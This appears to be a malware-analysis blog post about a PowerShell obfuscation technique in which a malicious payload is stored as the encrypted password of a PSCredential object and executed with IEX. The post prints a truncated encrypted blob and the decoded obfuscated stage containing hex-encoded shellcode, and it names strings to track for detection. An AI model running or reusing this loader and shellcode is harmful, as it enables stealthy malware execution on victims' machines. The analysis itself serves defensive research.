Powershell Payload Stored in a PSCredential Object
An interesting obfuscation technique to store a malicious payload in a PowerShell script: In a PSCredential object!
The PSCredential[1] class can be used to manage credentials in a centralized way. Just have a look at this example.
First, let's encrypt our strong password:
PS C:\Users\REM> $password = ConvertTo-SecureString 'MyStr0ngP4ssw0rd' -AsPlainText -Force PS C:\Users\REM> $password System.Security.SecureString
Now, we can create the PSCredential object:
PS C:\Users\REM> $credential = New-Object System.Management.Automation.PSCredential ('admin', $password) PS C:\Users\REM> $credential UserName Password -------- -------- admin System.Security.SecureString
To get the password in cleartext, just do this:
PS C:\Users\REM> $credential.GetNetworkCredential().Password MyStr0ngP4ssw0rd
The sample that I found implements the same technique but, as you can expect now, the password is not a simple string but PowerShell code that can be processed via 'IEX'. Here is the sample of code:
( NEw-ObJECT manaGEMeNT.AUtomatiON.pScreDENtial ' ', ( ' 76492d1116743f0423413b16050a5345MgB8AEUANQBJAHEATABtAHUAVAB1AEoAdwBYADkAMgA1AHYANgBqADUAZgBuAGcAPQA9AHwAMAA1AGQAMQAzADEAOABmADcAOAA1AGMAZQBjAGIAMAB jADIAYQBhADQAZQA0ADMAZQAzADIAOABmAGMANQA3ADkAMABhADYANwA5ADEAZgA5ADgAYgA4AGMANgA1AGYAYwAzADEANwA3ADEAYQA0AGMANwBiADQAZAA3AGIANgBiAGYANwBiAGYAZQA0AD EAZgBjADQAOABkAGIAZAAxAGUAYgA2ADEAZABkADMAMQA0ADcAZQBmAGYAZQA0ADEAYwA3AGMAMAA2ADgANAA4ADIANQA5ADkAZAAwADIAZAAyAGIAYgA0AGMAYQAxAGIANQAyADMAYgBjADcAO QA0AGIANgA2ADAAMAA1ADkANgA0ADMAYQA2AGEANwBlADgAMgAxAGYAZAAyAGMAZgA4AGQANwBmAGIAOQAxADIAYgBiAGEAYQAxAGQAYgA1ADQAOAA4ADAAZAA5ADQAOAAwADAAMwA5ADcANQBh AGQAZQA4ADMAZgAwADYAZQBkAGQAMgBjADAANQA3AGEAZgBhADgAOQBmADkAMAA2ADcAZAA5AGIAYwBiADAAOAAxADkAOAAxAGUANwBlAGQAZgA5ADQANgAwADkAOQBiADAAYgBkADIAZQBhADU AZAA0ADAANgBiAGQAMABlAGUAOABmADEAYgA4ADEAMgBlAGMAOABhADAAYQAyADAAZgBkADMANwBjADQANABkAGUAMQAzADMANQBhADUAZgAyADMAYgBiADUAMQBiAGYANgAwADUAYgBjADMAMA AzAGQANAA1ADkANQBmADcAYgA1ADIAZQA0ADIAOQA0ADQAMwBmAGMANgA1AGIAOQA2ADQAMwBmAGEAOAAzADUAZABmADgAMABmAGQAZQBmADQAZgAwAGUAYQBkAGEAOQAyADgANwA0AGUANABjA DcANQAyADEAMgBjADEAMgBjADgAMgBkADYAMgAyADYAMwBmAGYAMgBmADgAZQA0ADUAZAA2ADcAZQAwAGUANQAzAGYAZABkADgANwA5AGIAOQA1AGIAMAAwAGUANwA4AGMAYwA0ADQAYgAxAGQA NgBkAGUAOQA1ADkAYwA1ADcANwA4AGEAMQAxAGQAYgBiAGMANQAwADIAYQA5AGUAYgA5AGEAZQBlAGEAMQBiAGQAYQA3ADgANQBlADQAMgAyADAAMABhAGQAOAA1ADQAOQBhADkAMwA1ADIAMwA 3AGEAYQBlADEAZgAxADgANwA5ADMAYwA5AGUAZgA1AGQAMAA5AGMAOQA4ADQAMwAyADcAZgA0ADAAYgA2ADUANwA1ADEANQAyAGMAMAAxADcAYQBhADMANwAyADkAYQAyADYAYwBmAGUAZgBlAD UAOABkADAAZgA2ADAAYwAyAGYAYgBhADEANgBkAGIAOAAyAGMAMgBlADYAMgBkADUAMABhAGIAMQAwADkAMwBjAGMANQBmADMAMABkADgANwAxADQAZQAwADAAMwBjADgAMABlADUAYwBjADYAY (...code removed...) ADEAMAA3ADQANgAyADgAZQBiADIANwBhADkAYwAxADkAMABlADQANQA1ADcAMQBjAGMAMQAwADEAZAA5ADgAOQBiADkANwAwAGEAZQA4ADcAZAAzAGMAZAA2ADMAZgBhAGUANgBiAGMAZABiADQ AOABjADQAOQBmADgANAA0AGMAMgBjAGMAOABjAGUANwA4ADcAYwBmAGQAYgBhAGIAYgAzAGEAOAA1AGEAMAAwADYAOQA0AGQAYQBlADcAOABjAGEANgA2ADkANgBjADAAMwA5ADMAOQBmADAAMQ AxAGMAZQBiAGEAZAAyADgAMQAzADMAZAAyAGMAZABkAGEAYgBkADgAYwA5AGYAMQBkADMAMAA0ADAANgBhADEAYgA5AGQAYgBmADAAZgBjAGYANwA2AGMAMwA2ADIAZAA2ADQANABkADQANwBlA DgAMwAxAGQAYQBiADIAMQA5AGQAMgBmADAAYQBmADkAZgAzAGMANAAyAGUAZQAyAGQAMwA1ADgANwAwADYANwBmADYAOAA1ADYAOAA3ADYANABkAGIAOABiADQAMgA2ADUANAA4AGEAZQA3ADYA '|cOnVErtTo-seCUreSTriNG -KeY (1..32) )).getnETwoRKcrEDEnTiaL().PAsSWOrD | iex
I removed most of the data for more readability. The complete code is approximately 70KB.
You can see the presence of a call to ConvertTo-SecureString(). It's mandatory to convert the string into a secure string. Indeed, SecureStrings can't be printed as regular strings and must be converted. You can compare ConvertTo-SecureString to decoding a Base64 chunk of data.
Here is the content of the "password":
. ( $VERBOSePRefereNCe.toSTRiNG()[1,3]+'X'-join'')( [sTRInG]::join( '' ,([rEGEX]::mAtchEs( ") )63]RAHc[]GniRts[,)96]RAHc[+79]RAHc[+201]RAHc[( (EcAlPeR.)43]RAHc[]GniRts[,'iWy'(EcAlPeR.)93]RAHc[]GniRts[,)78]RAHc[+511]RAHc[+66]RAHc[((EcAlPeR.)'}5dx'+'0,ffx0,35x0,0x0,a6x0,65x0,2ax0,5bx0, 0fx0,bbx0,0x0,56'+'x0,d6x0,e2x0,37x0,e6x0,46x0,46x0,97x0,d6x0,e2x0,e6x0,46x0,46x0,ffx0,ffx0,ffx0,b6x0,8ex0,f5x0,3cx0,85x0,5ex0,57x0,0cx0,58x0, 3cx0'+',1x0,7x0,b8x0,fcx0,47x0,0cx'+'0,58x0,5dx0,ffx0,2ex0,98x0,69x0,21x0,86x0,65x0,35x0,0x0,0x0,02x0,0x0,86x'+'0,'+'75x0,7ex0,98x0,35x0,35x0, 39x0,5dx0'+',ffx0,5ex'+'0,35x0,4ax0,85x0,86x0,35x'+'0,0x0,04x0,0x0,0x0,86x0,0x0,0x0,01x0,0x0,'+'86x0,04x0,a6x0,0x0,0x0,0x0,a4x0,8ex0,dcx0,57x0 ,f4x0,5dx0,ffx0,0ex0,53x0,0fx0,44x0,86x0,0x0,0x0,31x0,88x0,86x0,41x0,57x0,0cx0,58x0,5dx0,ffx0,b7x0,81x0,6x0,d2x0,8'+'6x0,65x0,35'+'x0,35x0,35x 0,35x0,5dx0,ffx0,68x0,e9x0,64x0,57'+'x0,8'+'6x0,65x0,f1x'+'0,a6x0,05x0,4x0,a6x0,0ex0,98x0,0x0,0x0,33x0'+',08x0,86x0,f5x0,ax0,a6x0,69x0,5dx0,ff x0,b3x0,e2x0,55x0,bex0,86x0,65x0,35x0,75x0,35x'+'0,35x0,35x0,48x0,0ex0,23x0,0x0,86x0,35x0,6cx0,98x0,5dx0,ffx0,6cx0,f9x0,98x0,75x0,8'+'6x0'+',0 5x0,0x0,37x0,86x0,93x'+'0,37x0,64x0,b4x0,07x0,26x0'+',14x0,45x0,13x0,d6x0,14x0,17x0,86x0,47x0,14x0,34x0,77x0,03x0,27x0,24x0,85x0,96x0,'+'d2x0, f4x0,86x0,e4x0,14'+'x0,17x0,65x0,76x0,37x0,37x0,97x0,c4x0,c6x0,13x0,'+'47x0,15x0,a6x0,57x0,47x0,95x0,85x0,03x0,15x'+'0,96x0,15x0,85x0,45x0,05x 0,d4x0,74x0,25x0,84x0,53x0,03x0,c4x0,47x0,13x0,a5'+'x0,73x0,74'+'x0,43x0,14x0,77x0,e6x0,d6x0,54x0,7'+'5x0,35x0,75x0,77x0,b6x0,54x0,14x0,67x0,f 5x0,'+'a6x0,43x0,95x0,15x0,e4x0,53x0,55x0,26x0,f2x0,0x0,0x0,0x0,8ex0,8ex0,0x0,0x0,1x0,bbx0,86x0,35x0,35x0,3x0,a6x0,35x'+'0,35x0,5dx0,ffx0,7ax0 ,97x0,65x0,a3x0,86x0,0x0,f6x0,b6x0,36x0,56x0,74x0,02x0,56x0,b6x0,96'+'x0,c6x0,02x0,92x0,03x0,e2x0,13x0,13x0,a3x0,67'+'x0,27x0,02x0,b3x0,03x0,e 2x0,73x0,f2x0,47x0,e6x0,56x0,46x0,96x0,27'+'x0,45x0,02x0,b3x0,13x0,e2x0,63x0,02x0,45x0,e4x0,02x0,37x0,77x0,f6x0,46x0,e6x0'+',96x0,75x0,82x0,02 x'+'0,03x0,e2x0,53x0,f2x0,16x0,c6x0,c6x0,96x0,a7x0,f'+'6x0,d4x0,0x0,0x0,0x0,e3x0,8ex0,35x0,35x0,35x0,35x0,35'+'x0,bdx0,13x0,5dx0,ffx0,7x0,62'+ 'x0'+',77x0,c4x0,86x0,45x0,96x0,e6x0,96x0,77x0,86x0,0x0,47x0,56x0,e6x0,86x0,d5x0,d8x0,bex0,21x0,b8x0,a5x0,f5x0,f5x0,0ex0,ffx'+'0'+',15x0,a5x0, 95x0,16x0,b5x0,b5x0,42x0,42x0,44x0,98x0,0dx0,1x0,b8x0,4x0,b8x0,3dx0,1x0,c1x0,85x0,b8x0,b4'+'x0,cx0,b8x0,'+'66x0,3dx0,1x0,42x0'+',8'+'5x0,b8x0, 85x0,4ex0,57x0,42x0,d7x0,b3x'+'0,8fx0,d7x0,3x0,6fx0,57x0,0ex0,83x0,7cx0,1x0,dx0,fcx0,1cx0,cax0,ffx0,13x0,6dx0,1x0,b8x0,43x0,b8x0,94x0,a3x0,3ex 0,81x0,94x0,b8x0,3dx0,1x0,02x0,95x0,b8x0,1'+'5x0,1dx0,1x0,84x0,3ex0,87x0,11x0,c4x0,b8x0,c3x0,a4x0,b8x0,01x0,25x0,b8x0,75x0,25x0,2fx0,2ex0,7cx0 ,1x0,dx0,fcx0,1cx0,02x0,c2x0,2x0,c7x'+'0,16x0,c3x0,cax0,ffx0,13x0,62x0,a4x0,7b'+'x0,fx0,82x0,27x0,b8x0,41x0,25x0,b8x0,cx0,25x0,b8x0,03x0,0'+'5 x0,b8x0,46x'+'0,0cx'+'0,13x0,5ex0,98x0,06x0,0x0,0x0,0x0,28x0,8ex0,cfx0 = fubEaf ]][etyB[ = fubEaf '+']][etyB[{esle}5dx0,ffx0,65x0,2ax0,5bx0,0f x0,2c'+'x0,7cx0,94x0,95x0,0x0,a6x0,85x0,'+'3cx0,85x0,2dx0,57x0,0cx0,58x0,3cx0,1x0,84x0,7x0,b8x0,66x0,2bx0,47x0,0cx0,58'+'x0,02x0,4cx0,'+'38'+' x0,84x0,5dx0,ffx0,0x0,0x0,0x0,0x0,2ex0,98x0,69x0,21x0,abx0,94x0,9f'+'x0,98x0,94x0,0x0,'+'0x0,02x0'+',0x0,0cx0,7cx0,94x0,adx0,98x0,84x0,1fx0,98 x0,84x0,7ex0,98x0,84x0,35x0,35x0,39x0,84x0,'+'5dx0,ffx0,0x0,0x0,0x0,0x0,5ex0,35x0,4ax0,85x0,abx0,94x0,0x0,0x0,01x0,0x0,0cx0,7cx0,94x0,01x0,2ex 0,1cx0,1dx0,98x0,94x0,a5x0,04x0,a6x0,95x0,35x0,'+'0x0,0x0,0x0,55x0,8ex0,aax0,bex0,2x0,4'+'7x0,fcx0,ffx0,84x0,5dx0,ffx0,0x0,0x0,0x0,0x0,'+'0ex0 ,53x0,0fx0,44x0,abx0,94x0,0x0,0x0,31x0,88x0,1cx0,7cx'+'0,84x0,f'+'1x0,57x0,0cx0,58x0,5dx0,ffx0,b7x0,81x0,6x0,d2x0,2cx0,7cx0,94x0,35x0,35x0,9cx 0,13x0,d4x0,9cx0,13x0,d4x0,1fx0,98x0,84x0,a5'+'x0,35x0,0cx0,13x0,d4x0,5d'+'x0,ffx0,0x0,0x0,0x0,0x0,68x0,e9'+'x0,64x0,57x0,abx0,94x0,95x0,14x0, 4x0,a6x0,0ex0,98x0,94x0,0x0,0x'+'0,33x0,08x0,86x0,25x0,a5'+'x0,f1x0,a6x0,1fx0,98x0,84x0,f5x0,ax0,a6x'+'0,6cx0,98x0,84x0,5dx0,ffx0'+',b3x0,e2x0 ,55x0,bex0,2cx0,7cx0,94x0,35x0,35x0,05x0,0x0,0x0,0x0,0x0,48x'+'0,0ax0,23x0,0x0,8bx0,84x0,'+'35x0,9cx0,13x0,d4x0,85x0,14x0,a5x0,35x0,1cx0,98x0, 84x0,0x0,17x0,66x0,65x0,63x0,a6'+'x0,93x0,16x0,67x0,83x0,54x0,76x0,84x0,d4x0,d2'+'x0,26x0,05x0,67x0,94x0,46x0,45x0,34x0,74x0,03x0,a6x0,d4x0,e6 x0,03x0,37x0,46x0,25x0,53x0,63x0,54'+'x0,97x0,b4x0,96x'+'0,95'+'x0,d6x0,67x0,34x0,37x0,d2x0,46x0,37x0,47x0,43x0,33x0,46x0,77x0,34x0,05x0,96x0' +','+'c4x0,64x0,35x0,24x0,85x0,23x0,33x0,43x0,25x0,63x0,64x0,c4x0,a5x0,53x0,13x0,53x'+'0,56x0,e6x0,e4x0,66x0,f4x0,84x0,a5x0,a6x0,13x0,a7x0,f4x 0,26x0,76x0,85x0,15x0,36x0,97x0,86x0,a4x0,76'+'x0,c4x0,17x0,45x0,26x0,64x0,37x0,86x0,b6x0,26x0,'+'a4x0,64x0,76x0,86x0,56x0,74x0,13x0,76x0,15x0 ,e4x0,67x0,07x0,f2x0,0x0,0x0,0x0,f6x0,8ex0,5dx0,ffx0,0x0,0x0,0x0,0x0,6cx0'+',f9x0,98x0,75x0,abx0,94x0,35x0,3x0,a6x0,35x0,35x0,9cx0,13x0,d4x0,0 x0,0x0,1x0,bbx0,0cx0,7cx0,94x0,1cx0,98x0,84x0,a5x0,0x0,56x0,d6x0,e2x0,37x0,e6x0,46x0,46x0,97x0,d6x0,e2x0,e6x0,46x0,46x0,0x0,0x0,0x0,ex0,8ex0,5 dx0,ffx0,0x0,0x0,0x0,0x0,7ax0,97x0,65x0,a3x0,abx0,94x0,35x0,35x0,9cx0,13x0,d4x0,0cx0,13x0,d4x0,a5x0,35x0'+',1ex0,98x0,84x0,35x0,35x0,5dx0,ffx0 ,7x0,62'+'x0,77x0'+',c4x0,2cx0,7cx0,94x0,1ex0,98x0,84x0,65x0,14x0,0x0,47x0,56x0,e6x0,96x0,e6x0,96x0'+',77x0,ebx0'+',94x'+'0,35x0,bdx0,13x0,84x 0,d5x0,ffx0,ffx0,f'+'fx0,b4x0'+',9ex0,21x0,b8x0,84x0,a5x0,95x0,14x0,85x0,0ex0,ffx0,25x0,14x0,02x0,cex0,38x0,84x0,a5x0,14x0,95x0,14x0,85x0,'+'1 4x0,a5x0,95x0,e5x0,85x0,14x0,85x0,14x0'+',0dx0,1x0,84x0,88x0,4x0,b8x0,14x0,0dx0,1x0,94x0,c1x0,04x0,b8x0,44x0,84x0,cx0,b8x0,14x0,66x0,0'+'dx0,1 x0,94x0,42x0,04x0,b8x0,44x0,85'+'x0,8dx0,5'+'7x0,1dx0,93x0,54x0,8x0,42x0'+',c4x0,3x0,c4x'+'0,1fx0,57x0,0ex0,83x0,1cx0,1x0,14x0,dx0,9cx0,1cx0,1 4x0,cax0,0'+'cx0,13x0,84x0'+',9cx0,13x0,d4x0,6dx0,1x0,84x0,88x0,43x0,b8x0,14x0'+',9cx0,ffx0,84x0,65x0,3ex0,0dx0,1x0,94x0,02x0,04x0,b8x0,44x0,8 1x0,84x0,b8x0,05x0,0dx0,1x0,84x0,76x0,47x0,0cx0,58x0,84x0,0x0,0x0,0x0,88x0,08x0,'+'b8x0,0x0,0x0,0x0,27x0,58x0,fx0,2x0,bx0,81x0,8'+'7x0,18x0,66 x0,0dx0,1x0,84x0,c3x0,24x0,b8x0,02x0,25x0,b8x0,84x0,15x0,14x0,25x0,dex0,2ex0,1cx0,1x0,14x0,dx0,9cx0,1cx0,'+'14x0,02x0,c2x0,2x0,c7x0,16x0,c3x0, cax0,0cx0,13x0,84x0,9cx0,13x0,d4x0,a4x0'+',a4x0,7bx'+'0,f'+'x0,84x0,05x0,27x0,b8x0,84x0,02'+'x0,25x0,b8x0,84x0,81x'+'0,25x0,b8x0,84x0,06x0,25x 0,b8x0,84x0,56x0,2dx0,13'+'x0,84x'+'0,65x0,15x0,25x0,05x0,14x0,15x0,14x0,0x0,0x0,0x0,ccx0,8ex0,0fx0,4ex0,38x0,84x0,cfx0 = fub'+'Eaf ]][etyB[ = fubEaf ]][etyB[{)WsB46DMAWsB qe- '+']iWyERUTCETIHCRA_ROSSECORPiWy[selbairaVtnemnorivnE.ofnItratS.kcu'+'femosEaf( fi'(( )'x'+]31[DiLLeHs$+]1[D iLleHs$ ( & " ,'.', 'R'+'ig'+'hTTOLe'+'FT')| foreAch{$_.vAlUE })) )
If you're interested in this technique, the file is available on VT (SHA256:ead30df7867c2bcb99de71c1686e82d49c6fcc3ba00092a9fc8d878b78c62302) with a score of 6/59[2].
Based on this, I added 'Management.Automation.PSCredential' and 'ConvertTo-SecureString' to the list of suspicious strings to track in PowerShell scripts!
[1] https://docs.microsoft.com/en-us/dotnet/api/system.management.automation.pscredential?view=pscore-6.2.0
[2] https://www.virustotal.com/gui/file/ead30df7867c2bcb99de71c1686e82d49c6fcc3ba00092a9fc8d878b78c62302/detection
Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key
Reverse-Engineering Malware: Advanced Code Analysis | Online | Greenwich Mean Time | Oct 28th - Nov 1st 2024 |
Comments